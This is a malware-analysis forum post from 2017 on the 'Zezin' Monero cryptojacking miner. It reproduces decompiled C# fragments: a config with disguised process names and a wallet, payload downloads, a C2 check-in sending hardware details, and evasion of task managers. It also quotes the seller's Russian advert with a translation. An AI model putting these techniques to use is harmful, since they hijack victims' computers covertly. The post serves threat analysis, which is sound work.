Forum for analysis and discussion about malware.
Post Reply
User avatar
Global Moderator
Posts: 1670
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society


Post by Xylitol » Sun Dec 10, 2017 11:31 pm

New monero miner called Zezin due to it's pdb (and also because other signaures from AV sucks), originally found by siri (i guess)
Particularity to have a control panel: ... 3919035392 ... 0389664769

Sample in attach (17kb): VxVault - VT
Connect to a server for getting mining tool and start mining.
Attempt to detect if one of these process are running: taskmgr, procexp, ProcessHacker, procexp64
And if yes hide kill (lol, what did you expect) the miner, till these process disapear.
- Settings:

Code: Select all

internal class Settings
    // Fields
    public const string dcr_name = "audiodg.exe";
    public const string DcrArgs = "--blake256 -o -u vlad12345123.user -p password";
    public const string DcrBlake = "";
    public static bool DcrEnable = false;
    public const string DcrUrl = "";
    public static string ExecutableDir = Environment.CurrentDirectory;
    public static string ExecutablePath = Application.ExecutablePath;
    public const string Gate = "";
    public const string Mutex = "1";
    public const int Timeout = 30;
    public const string Update = "";
    public const string xmr_name = "curl.exe";
    public const string XmrArgs = "-o -u 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o -p x -t 4 --donate-level=1";
    public const string XmrUrlX32 = "";
    public const string XmrUrlX64 = "";
- Main routine:

Code: Select all

internal class Program
    // Methods
    private static void Main(string[] args)
            new Controller();
- Various parts:

Code: Select all

DownloadFile("", DirectoryWithDcr + "audiodg.exe");
DownloadFile(SystemInformation.Is64Bit ? "" : "", DirectoryWithXmr + "curl.exe");
public static void GetCommands()
    object[] args = new object[] { SystemInformation.HardwareId, SystemInformation.Is64Bit, "1", SystemInformation.GetGpuName(), SystemInformation.GetCpuName(), DateTime.Now };
    string parameter = string.Format("?machine_id={0}&x64={1}&version={2}&video_card={3}&cpu={4}&junk={5}", args);
    GetResponse("", parameter);
Some stats from the guy spreading the sample:

Code: Select all

Address: 43GmE9A1TQo7sNS7CHUvvbgK1eDTYd1FtQKnP27URLkngsaxkfHKBogJaHEf1CmnbeLaNAUdmCqRoX6iBNLDy4RyKDHXy4o
Pending Balance: 0.099649891113 XMR
Personal Threshold (Editable):
0.500 XMR
Total Paid: 0.000000000000 XMR
The following stats are only for the base address and not all workers:
Last Share Submitted: 3 days ago
Hash Rate: 0.00 H/sec
Total Hashes Submitted: 487883029
epic fail profit.

Some know servers used by Zezin: Advert from 14 oct 2017 sold by 'A310':

- Поддержка CPU (определение: x32/x64)
- Поддержка GPU (определение: Radeon/Nvidia).
- Скрытие майнера от большинства таскеров.
- Возможность обновления бота.
- Авторан (не реестр).
- Доступна торифицированная версия бота (выдаю только в очень крайних случаях).
- Контроль майнеров (в любом случае майнер будет восстановлен, пока жив бот).
- Запасной адрес отстука. (Опционально)
- Рандомная генерация воркеров на основе ид машины. (Опционально)
- Бесплатные ребилды.
- Вес: 60 КБ.
- NET 2.0.
- Все обновления и любая поддержка по боту бесплатны.
- Можно менять конфигурацию майнера прямо из панели (пул, кошелек, нагрузка и тд.).

Стандартная сборка майнеров:
Monero (CPU) + Опционально: Decred (GPU)

ЯП: C#

Функционал Панели:

- Dashboard:
[*] Онлайн, Живые, За все время, За сутки.
[*] Последние машины.

- Machines:
[*] Статистика по всем ботам.
[*] Уникальный ID машины, Битность, Версия бота, Видеокарта, ЦПУ, Первый онлайн, Последний онлайн.

- Update:
[*] Возможность обновить бота.

- Arguments:
[*] Возможность сменить конфигурацию майнера.

Цена Комплекта: 125$.



- CPU support (definition: x32 / x64)
- GPU support (definition: Radeon / Nvidia).
- Miner is not visible if detected (taskmanager, process explorer and etc.)
- Ability to update the bot (for changing the miners, new functionality).
- Hide the miner from most of the taskers.
- A Tor version of the bot is available. (in rare cases).
- Autoran (not the register).
- You can change the configuration of the miner directly from the panel (pool, purse, load, etc.).
- Random generation of vorkers based on the machine's id. (Optional)
- Control of the miners (in any case, the miner will be restored while the bot is alive).
- Free rebuildings.
- Size: 50 KB.
- NET 2.0.
- All updates and any support on the bot are free.

Standard assembly of the miners:
Monero (CPU) + Optional: Decred (GPU)


- Dashboard:
[*] Online, Alive, All Time, Day.
[*] Last Machines.

- Machines:
[*] Statistics for all bots.
[*] Unique machine ID, x32/x64, Bot Version, VideoCard, CPU, First Online, Last Online.

- Update:
[*] Update The Bot.

- Arguments:
[*] Ability to change the configuration of the miner.

Price Set: 125$.

+3 samples in attach ... 512959976/ - ... 512959977/ - ... 512959978/ -
You do not have the required permissions to view the files attached to this post.

Post Reply